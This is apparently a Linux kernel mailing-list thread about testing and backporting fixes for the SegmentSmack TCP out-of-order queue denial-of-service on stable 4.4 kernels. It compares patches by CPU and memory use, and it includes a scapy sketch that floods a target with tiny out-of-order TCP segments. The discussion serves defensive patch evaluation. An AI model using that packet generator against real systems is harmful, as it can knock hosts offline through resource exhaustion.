On 2018/8/17 0:06, Michal Kubecek wrote:
On Thu, Aug 16, 2018 at 05:24:09PM +0200, Greg KH wrote:
On Thu, Aug 16, 2018 at 02:33:56PM +0200, Michal Kubecek wrote:
Anyway, even at this rate, I only get ~10% of one core (Intel E5-2697).
What I can see, though, is that with the current stable 4.4 code, a modified testcase which sends something like
2:3, 3:4, ..., 3001:3002, 3003:3004, 3004:3005, ... 6001:6002, ...
quickly eats 6 MB of memory for the receive queue of one socket, while earlier 4.4 kernels only take 200-300 KB. I didn't test the latest 4.4 with Takashi's follow-up yet, but I'm pretty sure it will help while preserving nice performance with the original SegmentSmack testcase (with increased packet rate).
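For illustration, a rough scapy sketch of that traffic pattern might look like the lines below; the target address, port, source port and sequence base are made up, and it assumes an already-established connection so the tiny segments actually land in the out-of-order queue:

# Hypothetical sketch of the modified testcase pattern described above
# (not the actual PoC): 1-byte adjacent segments 2:3, 3:4, ... with a
# one-byte hole left every ~3000 segments so they stay out of order.
from scapy.all import IP, TCP, Raw, send

dst_ip = "192.0.2.1"   # assumed target of an established connection
dport  = 5001          # assumed destination port
sport  = 40000         # assumed source port
isn    = 1000000       # assumed sequence base of that connection

pkts = []
seq = 2                # relative offset added to the assumed ISN
for i in range(1, 6001):
    pkts.append(IP(dst=dst_ip) /
                TCP(sport=sport, dport=dport, flags="A", seq=isn + seq) /
                Raw(load=b"A"))      # 1-byte payload => segment [seq, seq+1)
    seq += 1
    if i % 3000 == 0:                # leave a one-byte hole, e.g. 3002:3003
        seq += 1

send(pkts, verbose=False)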
Ok, for now I've applied Takashi's fix to the 4.4 stable queue and will push out a new 4.4-rc later tonight. Can everyone standardize on that and test and let me know if it does, or does not, fix the reported issues?
I did repeat the tests with Takashi's fix and the CPU utilization is similar to what we have now, i.e. 3-5% with 10K pkt/s. I could still saturate one CPU somewhere around 50K pkt/s but that already requires 2.75 MB/s (22 Mb/s) of throughput. (My previous tests with Mao Wenan's changes in fact used lower speeds as the change from 128 to 1024 would need to be done in two places.)
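As a quick sanity check on those figures, assuming minimal 1-byte payloads (so roughly Ethernet 14 + IP 20 + TCP 20 + 1 = 55 bytes per frame; the actual sizes depend on the testcase and link layer):

pkt_rate = 50_000                    # packets per second
frame_len = 14 + 20 + 20 + 1         # assumed bytes on the wire per packet
print(pkt_rate * frame_len / 1e6)    # ~2.75 MB/s, i.e. ~22 Mb/s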
Where Takashi's patch does help is that it does not prevent collapsing of ranges of adjacent segments with total length shorter than ~4KB. It took more time to verify: it cannot be checked by watching the socket memory consumption with ss, as tcp_collapse_ofo_queue isn't called until we reach the limits. So I needed to trace when and how tcp_collapse() is called with both the current stable 4.4 code and the one with Takashi's fix.
The PoC by default attacks a Raspberry Pi system, whose CPU performance is low, so the default parameters are not aggressive. We enlarge the parameters when testing on our Intel Skylake system (which has much higher performance); without doing that, the CPU usage is not noticeably different with and without the fix, so you can't tell whether the patch really fixes it.
I have run a series of tests here, covering a low-rate attack (128B, 100ms interval) and a high-rate attack (1024B, 10ms interval), against the original 4.4 kernel, a kernel with only Takashi's patch, and a kernel with only Mao Wenan's patches, checking the CPU usage of ksoftirqd:
            original   Takashi   Mao Wenan
low rate    3%         2%        2%
high rate   50%        49%       ~10%
So I can't see that Takashi's patch really fixes the fundamental issue. I think the root cause lies in the simple out-of-order queue, and Eric's patch 72cd43ba ("tcp: free batches of packets in tcp_prune_ofo_queue()"), which is already included in my patch series, can fix this completely. That patch requires changing the simple queue to an RB tree, which makes searching for and dropping packets efficient and avoids large TCP retransmissions, so CPU usage falls.
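To illustrate the data-structure argument (a conceptual userspace Python sketch only, not the kernel code; the find_slot_* names are made up):

import bisect

def find_slot_linear(segments, start):
    # Walk the queued (start, end) segments one by one, as a plain list
    # forces the receiver to do for each out-of-order packet: O(n).
    for i, (s, _e) in enumerate(segments):
        if s >= start:
            return i
    return len(segments)

def find_slot_ordered(starts, start):
    # With segments kept ordered (upstream now uses an rbtree), the
    # insertion point is found by binary search: O(log n).  bisect only
    # models the lookup; a real rbtree also inserts and erases in O(log n).
    return bisect.bisect_left(starts, start)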
If not, we can go from there and evaluate this much larger patch series. But let's try the simple thing first.
At high packet rates (say 30K pkt/s and more), we can still saturate the CPU. This is also mentioned in the announcement, with the claim that a switch to an rbtree-based queue would be necessary to fully address that. My tests seem to confirm that, but I'm still not sure it is worth backporting something as intrusive into stable 4.4.
Michal Kubecek